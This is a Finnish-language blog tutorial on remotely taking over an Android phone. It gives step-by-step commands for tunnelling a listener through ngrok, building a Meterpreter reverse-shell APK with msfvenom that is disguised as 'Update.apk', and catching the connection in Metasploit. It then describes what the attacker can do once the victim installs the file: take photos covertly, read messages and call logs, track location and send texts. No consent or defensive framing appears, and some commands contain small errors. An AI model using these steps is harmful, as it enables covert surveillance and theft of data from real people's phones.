Hacking Android Device [Remotely]

Hacking over WAN

Voit tutustua video-oppaaseen youtubessa täältä:
https://youtu.be/Bbp-AcejtHI

Vakiintuneesti WAN:issa, ensinnäkin sinulla on oltava staattinen IP/Hostname ja toiseksi sinun täytyy tehdä Port Forwarding salliaksesi liikenteen siirron ja me kaikki tiedämme, että kumpikin on niin vaikeaa reaaliajassa, koska meillä on rajoitettu pääsy portteihin verkossa.

Tehdään siis tässä skenaariossa turvallinen tunneli Ngrokin avulla.

Ngrok on tunneloitava käänteinen välityspalvelinjärjestelmä, joka luo tunneleita julkisesta päätepisteestä eli internetistä paikallisesti toimivaan verkkopalveluun. Tämä voi auttaa meitä luomaan julkisen HTTP/HTTPS-URL-osoitteen paikallisesti koneellamme käynnissä olevalle verkkosivustolle. Meidän ei tarvitse tehdä minkäänlaista porttien välitystä Ngrokia käytettäessä, ja verkkopalvelumme paljastuu lopulta internetiin TCP-tunneloinnin avulla.

Seuraa näitä vaiheita edetäksesi:

Vaihe 1: Rekisteröidy Ngrok-tilille ladataksesi sen.

Ensiksi sinun on rekisteröidyttävä Ngrok-tilille, minkä jälkeen se pyytää sinua latausikkunaan.

Ngrok-tilin kirjautumisikkuna

Kirjautumisen jälkeen voit ladata Ngrokin Linux-järjestelmääsi.

Pura ladattu tiedosto yksinkertaisesti pakkauksesta.

Vaihe 2: Yhdistä tilisi

Komennon suorittaminen lisää auth-tunnuksesi oletusarvoiseksi määritetylle ngrok.yml konfiguraatiotiedostolle. Tämä antaa sinulle pääsyn useampiin ominaisuuksiin ja pidempiin istuntoaikoihin. (Sinun täytyy kopioida ja liittää oma tokenisi tänne, joka tarjotaan ngrokin aloitusnäytössä kirjautumisen jälkeen)

./ngrok authtoken <your token>

Nyt olet valmis käyttämään tätä työkalua. Avaa terminaali siirry hakemistoon, johon olet purkanut Ngrock-työkalun ja kirjoita:

./ngrok tcp

valitse porttinumero, johon haluat sitoa yhteyden(tässä olen valinnut porttinumeroksi 5555). Ja kun painat enteriä, tulee näkyviin jotakuinkin tällainen ruutu.

Lähetys tässähän määritetään TCP-tunneli, jonka ngrok on luonut. Yhteys on sitoutunut localhostiin porttiin 5555. Nyt meidän on luotava haitallista hyötykuormaa käyttämällä msfvenomia.

Vaihe3: Hyötykuorman luominen

Voit tehdä sen avaamalla uuden terminaalin Kali Linux -koneessasi ja kirjoittamalla sitten seuraavan koodin.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Mutta muistakaa, että tällä kertaa kyseessä on hieman erilainen hyökkäys kuin hyökkäys, jonka teimme lähiverkossa. Tässä IP-osoitteen sijasta meidän on syötettävä ngrokissa annettu edelleenlähetyslinkki (2.tcp.ngrok.io). Portin numero on 15787. Muista, että on tärkeää syöttää sama porttinumero, jonka Ngrok tarjoaa portin välityksessä.

Huomautus: Jos IP-osoitteen syöttäminen muodossa 2.tcp.ngrok.io ei toimi, voit korvata sen IP-osoitteella, jonka saat käyttämällä ”ping”-käskyä.
Avaa terminaali ja kirjoita ping 2.tcp.ngrok.io ja paina enter. Saat IP-osoitteen, joka sinun on laitettava LHOSTin tilalle.

Tässä olen käyttänyt hyötykuorman tiedostonimenä ”Update.apk”. Tämä tiedosto on asennettava kohteemme Android-laitteeseen. Mutta ennen tämän tiedoston asentamista meidän on asetettava kuuntelijamme. Seuraa vaihetta 4.

Vaihe 4: Kuuntelijan asettaminen

Avaa terminaali ja lataa Metasploit-konsoli kirjoittamalla: msfconsole
Sen jälkeen kun se latautuu(muutaman sekunnin kuluttua), lataa multi-handler exploit kirjoittamalla:

use exploit/multi/handler

Nyt aseta käänteinen hyötykuorma kirjoittamalla:

set payload android/meterpreter/reverse_tcp

Säädä LHOSTiksi 0.0.0.0 ja LPORTiksi 5555
(Porttinumeron tulee olla sama kuin porttinumero, jota käytettiin yhteyden sitomiseen ngrok:ssa)

set LHOST 0.0.0.0.0
set LPORT 5555

Kirjoita lopuksi exploit kuuntelijan käynnistämiseksi.

Kuuntelutila on päällä

Vaihe 5: Asenna Malicious Update.apk-tiedosto kohdelaitteeseen

Anna uhrin asentaa sovellus ja suorita se heti, kun se on asennettu. Kun uhri koskettaa Avaa sovellus -vaihtoehtoa, saat käyttöösi kaikki android-laitteen ominaisuudet. Laitteen näytöllä ei kuitenkaan näy mitään sen jälkeen, kun sovellus on avattu.

Post-Exploitaatio

Kirjoita apu nähdäksesi erilaiset vaihtoehdot, joita voit käyttää eri tehtävien suorittamiseen uhrin laitteessa.
Voit päästä käsiksi uhrin kameraan ja ottaa valokuvan ilman, että siitä tarvitsee ilmoittaa. Voit myös tarkistaa heidän viestinsä, puhelulokinsa ja tallentaa ne järjestelmääsi.
Voit myös tarkastella ja avata minkä tahansa heidän laitteeseensa asennetun sovelluksen. Voit jopa saada käyttäjän tämänhetkiset sijaintikoordinaatit.
Voit myös lähettää viestejä mihin tahansa yhteystietonumeroon heidän laitteensa kautta.

Voit myös lähettää viestejä mihin tahansa yhteystietonumeroon hänen laitteensa kautta.

Vastaa

Sähköpostiosoitettasi ei julkaista.